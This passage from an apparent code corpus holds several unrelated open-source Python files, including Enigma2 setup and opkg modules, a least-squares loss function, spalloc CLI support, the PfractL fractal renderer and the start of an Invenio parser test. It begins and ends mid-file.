        # class behaviour now that args is populated.
        return self.msg
class SetupSummary(Screen):
    """LCD/summary companion screen mirroring the parent's current entry."""
    def __init__(self, session, parent):
        Screen.__init__(self, session, parent=parent)
        self["SetupTitle"] = StaticText(parent.getTitle())
        self["SetupEntry"] = StaticText("")
        self["SetupValue"] = StaticText("")
        # Only track the parent's selection while this summary is visible.
        self.onShow.append(self.addWatcher)
        self.onHide.append(self.removeWatcher)
    def addWatcher(self):
        if hasattr(self.parent, "onChangedEntry"):
            self.parent.onChangedEntry.append(self.selectionChanged)
            self.parent["config"].onSelectionChanged.append(self.selectionChanged)
            # Sync immediately so the summary is never blank on show.
            self.selectionChanged()
    def removeWatcher(self):
        if hasattr(self.parent, "onChangedEntry"):
            self.parent.onChangedEntry.remove(self.selectionChanged)
            self.parent["config"].onSelectionChanged.remove(self.selectionChanged)
    def selectionChanged(self):
        # Mirror the parent's currently selected entry/value, and push the
        # long description back into the parent's own description label.
        self["SetupEntry"].text = self.parent.getCurrentEntry()
        self["SetupValue"].text = self.parent.getCurrentValue()
        if hasattr(self.parent, "getCurrentDescription") and "description" in self.parent:
            self.parent["description"].text = self.parent.getCurrentDescription()
class Setup(ConfigListScreen, Screen):
    """Generic setup screen whose entries are generated from setup.xml."""
    ALLOW_SUSPEND = True
    def __init__(self, session, setup):
        Screen.__init__(self, session)
        # for the skin: first try a setup_<setupID>, then Setup
        self.skinName = ["setup_" + setup, "Setup"]
        self.list = []
        self.force_update_list = False
        # Locate the <setup key="..."> section matching the requested id.
        xmldata = setupdom.getroot()
        for x in xmldata.findall("setup"):
            if x.get("key") == setup:
                self.setup = x
                break
        self.setup_title = self.setup.get("title", "").encode("UTF-8")
        self.seperation = int(self.setup.get('separation', '0'))
        #check for list.entries > 0 else self.close
        self["key_red"] = StaticText(_("Cancel"))
        self["key_green"] = StaticText(_("OK"))
        self["description"] = Label("")
        self["HelpWindow"] = Pixmap()
        self["HelpWindow"].hide()
        self["VKeyIcon"] = Boolean(False)
        self["actions"] = NumberActionMap(["SetupActions", "MenuActions"],
            {
                "cancel": self.keyCancel,
                "save": self.keySave,
                "menu": self.closeRecursive,
            }, -2)
        ConfigListScreen.__init__(self, self.list, session=session, on_change=self.changedEntry)
        self.createSetupList()
        self["config"].onSelectionChanged.append(self.__onSelectionChanged)
        self.setTitle(_(self.setup_title))
    def createSetupList(self):
        # Rebuild the config list from the XML, honouring setup level,
        # hardware "requires" flags and "conditional" expressions, then
        # restore the previous selection.
        currentItem = self["config"].getCurrent()
        self.list = []
        for x in self.setup:
            if not x.tag:
                continue
            if x.tag == 'item':
                item_level = int(x.get("level", 0))
                # Hide entries above the user's chosen expertise level.
                if item_level > config.usage.setup_level.index:
                    continue
                requires = x.get("requires")
                if requires:
                    # A leading '!' inverts the SystemInfo feature test.
                    if requires.startswith('!'):
                        if SystemInfo.get(requires[1:], False):
                            continue
                    elif not SystemInfo.get(requires, False):
                        continue
                conditional = x.get("conditional")
                if conditional and not eval(conditional):
                    continue
                item_text = _(x.get("text", "??").encode("UTF-8"))
                item_description = _(x.get("description", " ").encode("UTF-8")) # don't change
                # The element text is a dotted config path; eval resolves
                # it to the live ConfigElement instance.
                b = eval(x.text or "")
                if b == "":
                    continue
                #add to configlist
                item = b
                # the first b is the item itself, ignored by the configList.
                # the second one is converted to string.
                if not isinstance(item, ConfigNothing):
                    self.list.append((item_text, item, item_description))
        self["config"].setList(self.list)
        if config.usage.sort_settings.value:
            self["config"].list.sort()
        self.moveToItem(currentItem)
    def moveToItem(self, item):
        # Reselect *item* after the list has been rebuilt (falls back to
        # the first entry when the item vanished).
        if item != self["config"].getCurrent():
            self["config"].setCurrentIndex(self.getIndexFromItem(item))
    def getIndexFromItem(self, item):
        return self["config"].list.index(item) if item in self["config"].list else 0
    def changedEntry(self):
        # Toggling booleans/selections may change which entries are
        # visible (via "conditional"), so rebuild immediately.
        if isinstance(self["config"].getCurrent()[1], ConfigBoolean) or isinstance(self["config"].getCurrent()[1], ConfigSelection):
            self.createSetupList()
    def __onSelectionChanged(self):
        # Deferred rebuild: when leaving a non-bool/non-selection entry a
        # rebuild was requested; detach the handler while rebuilding to
        # avoid re-entrancy.
        if self.force_update_list:
            self["config"].onSelectionChanged.remove(self.__onSelectionChanged)
            self.createSetupList()
            self["config"].onSelectionChanged.append(self.__onSelectionChanged)
            self.force_update_list = False
        if not (isinstance(self["config"].getCurrent()[1], ConfigBoolean) or isinstance(self["config"].getCurrent()[1], ConfigSelection)):
            self.force_update_list = True
    def run(self):
        # Entry point used when the screen is driven externally (wizards).
        self.keySave()
def getSetupTitle(id):
    """Return the UTF-8 encoded title of the setup.xml section whose key
    matches *id*; raise SetupError for unknown ids."""
    root = setupdom.getroot()
    for section in root.findall("setup"):
        if section.get("key") != id:
            continue
        return section.get("title", "").encode("UTF-8")
    raise SetupError("unknown setup id '%s'!" % repr(id))
| blzr/enigma2 | lib/python/Screens/Setup.py | Python | gpl-2.0 | 5,693 |
'''
A set of (smooth) loss functions.
Created on Oct 2, 2014
@author: jiayu.zhou
'''
import numpy as np;
def least_squares(w, X, y):
'''
least squares loss.
MATLAB verified function.
f(x) = 1/2 * ||X * w - y||_F^2.
Parameters
----------
w: np.matrix
X: np.matrix
y: np.matrix
Returns
----------
'''
Xw_y = np.dot(X, w) - y;
f = 0.5 * np.linalg.norm(Xw_y, 'fro')**2;
g = np.dot(X.T, Xw_y);
g = g.reshape(g.shape[0] * g.shape[1] , 1, order = 'F');
return [f, g]; | jiayuzhou/pyProxSolver | org/jiayu/optimization/smooth.py | Python | gpl-2.0 | 563 |
# Copyright (c) 2016-2019 The University of Manchester
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
from spalloc import (
config, ProtocolClient, ProtocolError, ProtocolTimeoutError,
SpallocServerException)
# The acceptable range of server version numbers
VERSION_RANGE_START = (0, 1, 0)
VERSION_RANGE_STOP = (5, 0, 1)
class Terminate(Exception):
    """Internal control-flow exception carrying an exit code and an
    optional (possibly format-templated) message for stderr."""

    def __init__(self, code, *args):
        super().__init__()
        self._code = code
        remaining = list(args)
        template = remaining.pop(0) if remaining else None
        if template is None:
            # No message requested at all.
            self._msg = None
        elif remaining:
            # Remaining positional args fill the {} placeholders.
            self._msg = template.format(*remaining)
        else:
            self._msg = template

    def exit(self):
        """Print the message (if any) to stderr and exit the process."""
        if self._msg is not None:
            sys.stderr.write(self._msg + "\n")
        sys.exit(self._code)
def version_verify(client, timeout):
    """Ask the server for its version and terminate (exit code 2) when it
    falls outside the supported [VERSION_RANGE_START, VERSION_RANGE_STOP)
    range."""
    parts = client.version(timeout=timeout).split(".")
    version = tuple(int(part) for part in parts)
    if VERSION_RANGE_START <= version < VERSION_RANGE_STOP:
        return
    raise Terminate(2, "Incompatible server version ({})",
                    ".".join(map(str, version)))
class Script(object):
    """Shared skeleton for spalloc command-line tools.

    Subclasses supply the argument parser and the command ``body``;
    ``__call__`` wires together config loading, the common server
    arguments, connection handling and error reporting.
    """
    def __init__(self):
        # Factory attribute so tests can substitute a fake client class.
        self.client_factory = ProtocolClient
    def get_parser(self, cfg):
        """ Return a set-up instance of :py:class:`argparse.ArgumentParser`
        """
        raise NotImplementedError
    def verify_arguments(self, args):
        """ Check the arguments for sanity and do any second-stage parsing\
            required.
        """
    def body(self, client, args):
        """ How to do the processing of the script once a client has been\
            obtained and verified to be compatible.
        """
    def build_server_arg_group(self, server_args, cfg):
        # Defaults for every option come from the user's spalloc config
        # file (see spalloc.config.read_config()).
        server_args.add_argument(
            "--hostname", "-H", default=cfg["hostname"],
            help="hostname or IP of the spalloc server (default: %(default)s)")
        server_args.add_argument(
            "--port", "-P", default=cfg["port"], type=int,
            help="port number of the spalloc server (default: %(default)s)")
        server_args.add_argument(
            "--timeout", default=cfg["timeout"], type=float, metavar="SECONDS",
            help="seconds to wait for a response from the server (default: "
            "%(default)s)")
        server_args.add_argument(
            "--ignore_version", default=cfg["ignore_version"], type=bool,
            help="Ignore the server version (WARNING: could result in errors) "
            "default: %(default)s)")
    def __call__(self, argv=None):
        # Returns a process exit code: 0 on success, 1 on communication or
        # server errors; Terminate carries its own code.
        cfg = config.read_config()
        parser = self.get_parser(cfg)
        server_args = parser.add_argument_group("spalloc server arguments")
        self.build_server_arg_group(server_args, cfg)
        args = parser.parse_args(argv)
        # Fail if server not specified
        if args.hostname is None:
            parser.error("--hostname of spalloc server must be specified")
        self.verify_arguments(args)
        try:
            with self.client_factory(args.hostname, args.port) as client:
                # Refuse to talk to incompatible servers unless overridden.
                if not args.ignore_version:
                    version_verify(client, args.timeout)
                self.body(client, args)
            return 0
        except (IOError, OSError, ProtocolError, ProtocolTimeoutError) as e:
            sys.stderr.write("Error communicating with server: {}\n".format(e))
            return 1
        except SpallocServerException as srv_exn:
            sys.stderr.write("Error from server: {}\n".format(srv_exn))
            return 1
        except Terminate as t:
            t.exit()
| project-rig/spalloc | spalloc/scripts/support.py | Python | gpl-2.0 | 4,226 |
#!/usr/bin/python
# Copyright (C) 2002 Noufal Ibrahim <noufal@cisco.com>
#
# This program is part of PfractL
#
# PfractL is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
from graphics import *
from editor import *
from FileDialog import *
from console import *
import math
import sys
import re
import stack
import pickle
logger=None
class parser(viewbox):
"Draws a string specified in our little language"
    def autocomplete(self):
        "Completes fractal components that are unspecified"
        # self.fractal is the dict parsed from a fractal definition file;
        # missing pieces (mirror generator, name, start position, depth,
        # starting angle) are filled in with derived or default values.
        logger ("Checking for incomplete entries",MESG)
        if (self.fractal.has_key('Rgen') and (not self.fractal.has_key('Lgen'))):
            logger ("Autogenerating Lgen from Rgen:"+self.fractal['Rgen'],MESG)
            temp=self.fractal['Rgen']
            ## All plusses with minuses
            # Three-step swap via the '.' placeholder so the second
            # substitution does not clobber characters already swapped:
            # '+' -> '.', '-' -> '+', '.' -> '-'.
            temp=re.sub("\+",".",temp)
            temp=re.sub("-","+",temp)
            temp=re.sub("\.","-",temp)
            ## All Rs with Ls and vice versa
            temp=re.sub("R",".",temp)
            temp=re.sub("L","R",temp)
            temp=re.sub("\.","L",temp)
            logger ("Lgen:"+temp,MESG)
            self.fractal['Lgen']=temp
        if (self.fractal.has_key('Lgen') and (not self.fractal.has_key('Rgen'))):
            logger ("Autogenerating Rgen from Lgen:"+self.fractal['Lgen'],MESG)
            temp=self.fractal['Lgen']
            ## All plusses with minuses and vice versa
            # Same placeholder trick, mirroring Lgen into Rgen.
            temp=re.sub("\+",".",temp)
            temp=re.sub("-","+",temp)
            temp=re.sub("\.","-",temp)
            ## All Rs with Ls and vice versa
            temp=re.sub("R",".",temp)
            temp=re.sub("L","R",temp)
            temp=re.sub("\.","L",temp)
            logger("Rgen:"+temp,MESG)
            self.fractal['Rgen']=temp
        if(self.fractal.has_key('name')):
            self.title(self.fractal['name'])
        else:
            logger("Fractal name string not found",MESG)
            self.title("Unspecified")
        if(self.fractal.has_key('xpos') and self.fractal.has_key('ypos')):
            self.x,self.y=self.fractal['xpos'],self.fractal['ypos']
        else:
            logger ("Fractal starting point unspecified",MESG)
            logger ("Using (132,"+str(HEIGHT-369)+")",MESG)
            # HEIGHT comes from the graphics module (canvas height).
            self.fractal['xpos'],self.fractal['ypos']=132,HEIGHT-369
            self.x=132
            self.y=HEIGHT-369
        if (not self.fractal.has_key('maxlevel')):
            logger("Fractal maximum level depth unspecified",MESG)
            logger("Using default 6",MESG)
            self.fractal["maxlevel"]=6
        if (not self.fractal.has_key('sangle')):
            logger("Fractal starting angle unspecified",MESG)
            logger("Using default 0",MESG)
            self.fractal['sangle']=0
        # Start rendering from level 1 with a fresh canvas state.
        self.level=1
        self.reset()
#Functions that handle all the artwork.
def renderstring(self,string,level):
"The actual parser that recognises the language"
for i in string:
# print "angle :: " ,self.cangle
# raw_input()
if i=='D': #Basic line
if (level == 1):
self.drawline(i)
# print i,
else:
# print "Before: " + str(self.fractal['length'])
self.fractal['length']=self.fractal['length']/self.fractal['divisor']
# print "expanding D into",self.fractal['Dgen'],level
self.renderstring(self.fractal['Dgen'],level-1)
self.fractal['length']=self.fractal['length']*self.fractal['divisor']
# print "After: " + str(self.fractal['length'])
elif i=='T':
if (level == 1):
self.drawline(i)
# print i,
else:
self.fractal['length']=self.fractal['length']/self.fractal['divisor']
# print "expanding T into",self.fractal['Tgen'],level
self.renderstring(self.fractal['Tgen'],level-1)
self.fractal['length']=self.fractal['length']*self.fractal['divisor']
elif i=='d':
if (level == 1):
self.movepointer()
else:
self.fractal['length']=self.fractal['length']/self.fractal['divisor']
self.renderstring(self.fractal['dgen'],level-1)
self.fractal['length']=self.fractal['length']*self.fractal['divisor']
elif i=='R':
if (level == 1):
self.drawline(i)
# print i,
else:
self.fractal['length']=self.fractal['length']/self.fractal['divisor']
# print "expanding R into",self.fractal['Rgen'],level
self.renderstring(self.fractal['Rgen'],level-1)
self.fractal['length']=self.fractal['length']*self.fractal['divisor']
elif i=='L':
if (level == 1):
self.drawline(i)
# print i,
else:
self.fractal['length']=self.fractal['length']/self.fractal['divisor']
# print "expanding L into",self.fractal['Lgen'],level
self.renderstring(self.fractal['Lgen'],level-1)
self.fractal['length']=self.fractal['length']*self.fractal['divisor']
elif i=='X':
if (level == 1):
self.drawline(i)
# print i,
elif i=='B':
self.drawline(i)
# print i,
elif i=='[':
self.bstack.push((self.x,self.y,self.cangle))
elif i==']':
(self.x,self.y,self.cangle)=self.bstack.pop()
elif i=='+':
## if (level == 1):
## print "+",
## if (level == 2):
## print ".+."
self.incrementangle()
elif i=="-":
## if (level == 1):
## print "-",
## if (level == 2):
## print ".-."
self.decrementangle()
else:
print "Invalid command character :",i
sys.exit(-1)
def drawline(self,symbol):
"Draws a line of the current length in the current direction"
x=self.x
y=self.y
a=self.fractal['length']
theta=self.cangle
tx=x + a*math.cos(self.factor*theta)
ty=y + a*math.sin(self.factor*theta)
self.line(x,y,tx,ty,symbol)
self.x=tx
self.y=ty
def movepointer(self):
"Simply moves the pointer in the current direction"
x=self.x
y=self.y
a=self.fractal['length']
theta=self.cangle
tx=x + a*math.cos(self.factor*theta)
ty=y + a*math.sin(self.factor*theta)
self.x=tx
self.y=ty
def incrementangle(self):
if (self.grammarflag == 1):
self.printmarker(self.x,self.y,'+',"blue")
self.cangle=self.cangle+self.fractal['angle']
def decrementangle(self):
if (self.grammarflag == 1):
self.printmarker(self.x,self.y,'-',"blue")
self.cangle=self.cangle-self.fractal['angle']
def redraw(self):
"""Redraws the fractal but I'm not sure of the details yet."""
self.clear()
self.renderstring(self.fractal['axiom'],self.level)
self.reset()
###################### #Callbacks for the buttons and stuff. ##################
def deactivatebuttons(self):
"Disables all the buttons"
for i in self.blist:
i.configure(state="disabled")
def deactivatemenus(self):
"Disables menu entries"
for i in self.mlist:
i[0].entryconfig(i[1],state="disabled")
def activatebuttons(self):
"Enables buttons"
for i in self.blist:
i.configure(state="normal")
def activatemenus(self):
"Enables menu items"
for i in self.mlist:
i[0].entryconfig(i[1],state="normal")
def pluscallback(self):
"What happens when the plus button is pressed"
self.deactivatebuttons() #Disable everything
self.deactivatemenus()
level=self.level #Increment, clear the canvas and redraw
if level != self.fractal['maxlevel']:
level=level+1
fractl.clear()
fractl.generatefractal(level)
else:
self.mesg ("Max level reached")
self.activatebuttons() #Reactivate everything
self.activatemenus()
def minuscallback(self):
"What happens when the minus button is pressed"
self.deactivatebuttons() #Disable everything
self.deactivatemenus()
level=self.level #Decrement and draw after clearing
if level != 1:
level=level-1
fractl.clear()
fractl.generatefractal(level)
else:
self.mesg ("Can't go less than 1")
self.activatebuttons() #Reactivate everything
self.activatemenus()
def poscallback(self,event):
"""Temporary binding for canvas.
Changes canvas behaviour to enable starting point selection.
Restores left mouse key after this is done and """
self.x,self.y=self.convert(event.x,event.y)
self.fractal['xpos'],self.fractal['ypos']=self.x,self.y
logger(str(event.x)+str(event.y),MESG)
self.canvas.unbind("<Button-1>")
self.canvas.configure(cursor="left_ptr")
self.mesg("")
def selectcallback(self):
"""Point selection callback. The callback for the button that
handles the starting point selection"""
self.mesg("Select starting point")
self.canvas.configure(cursor="crosshair")
self.canvas.bind("<Button-1>",self.poscallback)
def infocallback(self):
"Callback for the editor"
editor=fractaleditor(self)
def fileloadcallback(self):
"The dialog box etc. for the load menu item"
fd=FileDialog(self.root)
file=fd.go(".","*.pf")
# print " ***************** To load fractal file:", file,":" # DEBUG
if(file != None):
try:
f=open(file,"r")
except IOError:
self.mesg("No such file")
logger("No such file :"+file,ERROR)
self.activatebuttons()
return
self.fractal=pickle.load(f)
f.close()
logger("Loaded fractal file "+file,SPL)
self.autocomplete()
self.cangle=self.fractal['sangle']
fractl.redraw()
self.activatebuttons()
else:
self.mesg("Invalid file")
logger("Invalid file name :"+file,ERROR)
def filesavecallback(self):
"The dialog box etc. for the save menu item"
fd=FileDialog(self.root)
file=fd.go(".","*.pf")
if (file != None):
f=open(file,"w")
pickle.dump(self.fractal,f)
f.close()
logger("File "+file+" saved",SPL)
self.activatebuttons()
else:
self.mesg("Invalid file")
logger("Invalid file name",ERROR)
def consolecallback(self):
global logger
self.console=messageconsole(self,logger,self.loggerdummy)
logger=self.console.cprint
######################### Public interfaces ################################
def generatefractal(self,level):
self.level=level
self.mesg("Creating fractal - Level:"+str(self.level))
self.renderstring(self.fractal['axiom'],self.level)
self.mesg ("Level:"+str(self.level))
if (self.markerflag == 1):
self.marksegments()
self.reset()
def reset(self):
"Resets dynamic parameters"
self.x,self.y=self.fractal['xpos'],self.fractal['ypos']
self.cangle=self.fractal['sangle']
def loggerdummy(self,t1,t2):
pass
## def temp_stub(self):
## self.fractal={"name":"Testing",\
## "ypos":454.0,\
## "maxlevel":12.0,\
## "sangle":0.0,\
## "xpos":74.0,\
## "Lgen":"+RDX-LDL-XDR+",\
## "Rgen":"-LDX+RDR+XDL-",\
## "Dgen":"DXX",\
## "divisor":2.33333,\
## "angle":90.0,\
## "length":200,\
## "axiom":"L"
## }
def __init__(self):
"Initialises parser components"
#Starting coordinates and angle
# self.temp_stub()
global logger
logger=self.loggerdummy
self.bstack=stack.Stack()
self.lstack=stack.Stack()
self.factor=math.pi/180.0 #rad to degree
self.level=1
self.initialise(bg="#ffe4b5",fg="chocolate") #Set up graphics routines
self.setcallbacks(plus=self.pluscallback,\
minus=self.minuscallback,\
select=self.selectcallback,\
query=self.infocallback,\
console=self.consolecallback,\
loadfile=self.fileloadcallback,\
savefile=self.filesavecallback)
try:
if self.fractal:
pass
except AttributeError:
self.deactivatebuttons()
# Single global parser/window instance used by the button callbacks.
fractl=parser()
def main():
    """Maps the window and draws the loaded fractal at level 1."""
    global fractl
    fractl.map()
    fractl.generatefractal(1)
main()
| nibrahim/PFractL | PfractL.py | Python | gpl-2.0 | 14,705 |
import os
from enigma import eConsoleAppContainer
from Components.Harddisk import harddiskmanager
opkgDestinations = []  # mountpoints usable as extra opkg package destinations
opkgStatusPath = ''  # path (relative to a mountpoint) of the opkg status file; detected lazily
def opkgExtraDestinations():
    """Return the ' --dest <mp>:<mp>' arguments for every registered
    opkg destination, concatenated into a single string."""
    global opkgDestinations
    args = []
    for mountpoint in opkgDestinations:
        args.append(" --dest %s:%s" % (mountpoint, mountpoint))
    return ''.join(args)
def opkgAddDestination(mountpoint):
    """Intentionally a no-op.

    Registering extra opkg destinations is disabled; the previous
    implementation appended *mountpoint* to the global opkgDestinations
    list and logged it.
    """
    pass
    #global opkgDestinations
    #if mountpoint not in opkgDestinations:
    #opkgDestinations.append(mountpoint)
    #print "[Ipkg] Added to OPKG destinations:", mountpoint
#print "[Ipkg] Added to OPKG destinations:", mountpoint
def onPartitionChange(why, part):
    """Partition hotplug hook: track mountpoints that carry an opkg tree.

    why: 'add' or 'remove'; part: a Harddisk partition object with a
    .mountpoint attribute.
    """
    global opkgDestinations
    global opkgStatusPath
    mountpoint = os.path.normpath(part.mountpoint)
    # Ignore the root filesystem and unmounted partitions.
    if mountpoint and mountpoint != '/':
        if why == 'add':
            # Determine where this opkg build keeps its status file (done
            # once, by probing the root filesystem layout).
            if opkgStatusPath == '':
                # older opkg versions
                opkgStatusPath = 'usr/lib/opkg/status'
                if not os.path.exists(os.path.join('/', opkgStatusPath)):
                    # recent opkg versions
                    opkgStatusPath = 'var/lib/opkg/status'
            # Only register mountpoints that already contain an opkg tree.
            if os.path.exists(os.path.join(mountpoint, opkgStatusPath)):
                opkgAddDestination(mountpoint)
        elif why == 'remove':
            # Best-effort removal; the mountpoint may never have been added.
            try:
                opkgDestinations.remove(mountpoint)
                print "[Ipkg] Removed from OPKG destinations:", mountpoint
            except:
                pass
# Subscribe to future partition changes and replay the currently mounted
# partitions so already-present opkg trees are picked up at import time.
harddiskmanager.on_partition_list_change.append(onPartitionChange)
for part in harddiskmanager.getMountedPartitions():
    onPartitionChange('add', part)
class IpkgComponent:
    """Asynchronous driver for the opkg/ipkg command-line tool.

    Commands are spawned through eConsoleAppContainer; their stdout is
    parsed line by line and reported to registered callbacks as
    (event, param) pairs using the EVENT_* constants below.
    """
    # Events delivered to callbacks while a command runs.
    EVENT_INSTALL = 0
    EVENT_DOWNLOAD = 1
    EVENT_INFLATING = 2
    EVENT_CONFIGURING = 3
    EVENT_REMOVE = 4
    EVENT_UPGRADE = 5
    EVENT_LISTITEM = 9
    EVENT_DONE = 10
    EVENT_ERROR = 11
    EVENT_MODIFIED = 12
    # Commands accepted by startCmd().
    CMD_INSTALL = 0
    CMD_LIST = 1
    CMD_REMOVE = 2
    CMD_UPDATE = 3
    CMD_UPGRADE = 4
    CMD_UPGRADE_LIST = 5
    def __init__(self, ipkg = 'opkg'):
        """Create a component driving the given opkg/ipkg binary."""
        self.ipkg = ipkg
        self.cmd = eConsoleAppContainer()
        self.cache = None  # buffer for a partial (unterminated) stdout line
        self.callbackList = []
        self.setCurrentCommand()
    def setCurrentCommand(self, command = None):
        # Remembers which CMD_* is running so parseLine knows the context.
        self.currentCommand = command
    def runCmdEx(self, cmd):
        """Run *cmd* with the extra --dest arguments prepended."""
        self.runCmd(opkgExtraDestinations() + ' ' + cmd)
    def runCmd(self, cmd):
        """Spawn '<ipkg> <cmd>' and hook up the output/exit handlers."""
        print "executing", self.ipkg, cmd
        self.cmd.appClosed.append(self.cmdFinished)
        self.cmd.dataAvail.append(self.cmdData)
        # execute() returns non-zero when the process could not be started;
        # report that as an immediate (failed) completion.
        if self.cmd.execute(self.ipkg + " " + cmd):
            self.cmdFinished(-1)
    def startCmd(self, cmd, args = None):
        """Start one of the CMD_* operations; *args* is a dict of options."""
        if cmd is self.CMD_UPDATE:
            self.runCmdEx("update")
        elif cmd is self.CMD_UPGRADE:
            append = ""
            if args["test_only"]:
                append = " -test"
            self.runCmdEx("upgrade" + append)
        elif cmd is self.CMD_LIST:
            self.fetchedList = []
            if args['installed_only']:
                self.runCmdEx("list_installed")
            else:
                self.runCmd("list")
        elif cmd is self.CMD_INSTALL:
            self.runCmd("install " + args['package'])
        elif cmd is self.CMD_REMOVE:
            self.runCmd("remove " + args['package'])
        elif cmd is self.CMD_UPGRADE_LIST:
            self.fetchedList = []
            self.runCmdEx("list_upgradable")
        self.setCurrentCommand(cmd)
    def cmdFinished(self, retval):
        # Notify listeners and detach our handlers from the container.
        self.callCallbacks(self.EVENT_DONE)
        self.cmd.appClosed.remove(self.cmdFinished)
        self.cmd.dataAvail.remove(self.cmdData)
    def cmdData(self, data):
        """Accumulate stdout chunks and dispatch complete lines.

        A trailing fragment without '\n' stays buffered in self.cache until
        the next chunk arrives.
        """
        print "data:", data
        if self.cache is None:
            self.cache = data
        else:
            self.cache += data
        if '\n' in data:
            splitcache = self.cache.split('\n')
            if self.cache[-1] == '\n':
                iteration = splitcache
                self.cache = None
            else:
                iteration = splitcache[:-1]
                self.cache = splitcache[-1]
            for mydata in iteration:
                if mydata != '':
                    self.parseLine(mydata)
    def parseLine(self, data):
        """Translate one opkg output line into an EVENT_* callback."""
        # List-style commands produce 'name - version - description' rows.
        if self.currentCommand in (self.CMD_LIST, self.CMD_UPGRADE_LIST):
            item = data.split(' - ', 2)
            if len(item) < 3:
                self.callCallbacks(self.EVENT_ERROR, None)
                return
            self.fetchedList.append(item)
            self.callCallbacks(self.EVENT_LISTITEM, item)
            return
        # Everything else is matched on known opkg message prefixes.
        try:
            if data[:11] == 'Downloading':
                self.callCallbacks(self.EVENT_DOWNLOAD, data.split(' ', 5)[1].strip())
            elif data[:9] == 'Upgrading':
                self.callCallbacks(self.EVENT_UPGRADE, data.split(' ', 2)[1])
            elif data[:10] == 'Installing':
                self.callCallbacks(self.EVENT_INSTALL, data.split(' ', 2)[1])
            elif data[:8] == 'Removing':
                self.callCallbacks(self.EVENT_REMOVE, data.split(' ', 3)[2])
            elif data[:11] == 'Configuring':
                self.callCallbacks(self.EVENT_CONFIGURING, data.split(' ', 2)[1])
            elif data[:17] == 'An error occurred':
                self.callCallbacks(self.EVENT_ERROR, None)
            elif data[:18] == 'Failed to download':
                self.callCallbacks(self.EVENT_ERROR, None)
            elif data[:21] == 'ipkg_download: ERROR:':
                self.callCallbacks(self.EVENT_ERROR, None)
            elif 'Configuration file \'' in data:
                # Note: the config file update question doesn't end with a newline, so
                # if we get multiple config file update questions, the next ones
                # don't necessarily start at the beginning of a line
                self.callCallbacks(self.EVENT_MODIFIED, data.split(' \'', 3)[1][:-1])
        except Exception, ex:
            print "[Ipkg] Failed to parse: '%s'" % data
            print "[Ipkg]", ex
    def callCallbacks(self, event, param = None):
        # Fan an event out to every registered listener.
        for callback in self.callbackList:
            callback(event, param)
    def addCallback(self, callback):
        self.callbackList.append(callback)
    def removeCallback(self, callback):
        self.callbackList.remove(callback)
    def getFetchedList(self):
        # Valid after a CMD_LIST / CMD_UPGRADE_LIST run.
        return self.fetchedList
    def stop(self):
        self.cmd.kill()
    def isRunning(self):
        return self.cmd.running()
    def write(self, what):
        """Send *what* to the running command's stdin (e.g. a config-file
        update answer), appending the newline opkg waits for."""
        if what:
            # We expect unterminated commands
            what += "\n"
            self.cmd.write(what, len(what))
| kingvuplus/Test-OBH | lib/python/Components/Ipkg.py | Python | gpl-2.0 | 5,412 |
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2014, 2015 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Unit tests for the parser engine."""
# Legacy CVS keyword, kept for Invenio's versioning conventions.
__revision__ = \
    "$Id$"
import tempfile
from flask.ext.registry import PkgResourcesDirDiscoveryRegistry, \
ImportPathRegistry, RegistryProxy
from invenio.base.wrappers import lazy_import
from invenio.testsuite import make_test_suite, run_test_suite, InvenioTestCase
# Lazily-resolved parser entry points: the real objects are imported on
# first use so the full JSONAlchemy machinery is not loaded at module import.
Field_parser = lazy_import('invenio.modules.jsonalchemy.parser:FieldParser')
Model_parser = lazy_import('invenio.modules.jsonalchemy.parser:ModelParser')
guess_legacy_field_names = lazy_import(
    'invenio.modules.jsonalchemy.parser:guess_legacy_field_names')
get_producer_rules = lazy_import(
    'invenio.modules.jsonalchemy.parser:get_producer_rules')
# Package that holds the testsuite's field/model configuration files.
TEST_PACKAGE = 'invenio.modules.jsonalchemy.testsuite'

# Registry proxy restricted to the test package above.
test_registry = RegistryProxy('testsuite', ImportPathRegistry,
                              initial=[TEST_PACKAGE])


# PEP 8 (E731): named callables should be 'def's, not lambda assignments;
# behavior is unchanged -- both remain zero-argument factories.
def field_definitions():
    """Return a fresh discovery registry over the testsuite 'fields' dir."""
    return PkgResourcesDirDiscoveryRegistry(
        'fields', registry_namespace=test_registry)


def model_definitions():
    """Return a fresh discovery registry over the testsuite 'models' dir."""
    return PkgResourcesDirDiscoveryRegistry(
        'models', registry_namespace=test_registry)
def clean_field_model_definitions():
    """Reset the parsers' cached field/model definitions between tests."""
    for attr in ('_field_definitions', '_legacy_field_matchings'):
        setattr(Field_parser, attr, {})
    Model_parser._model_definitions = {}
class TestParser(InvenioTestCase):
    """Unit tests for the JSONAlchemy field and model parsers.

    Each test registers temporary field/model config files in the app's
    'testsuite' registries and checks parsing results or expected
    parser exceptions.
    """
    def setUp(self):
        # Install fresh field/model registries for every test.
        self.app.extensions['registry'][
            'testsuite.fields'] = field_definitions()
        self.app.extensions['registry'][
            'testsuite.models'] = model_definitions()
    def tearDown(self):
        del self.app.extensions['registry']['testsuite.fields']
        del self.app.extensions['registry']['testsuite.models']
    def test_wrong_indent(self):
        """JSONAlchemy - wrong indent"""
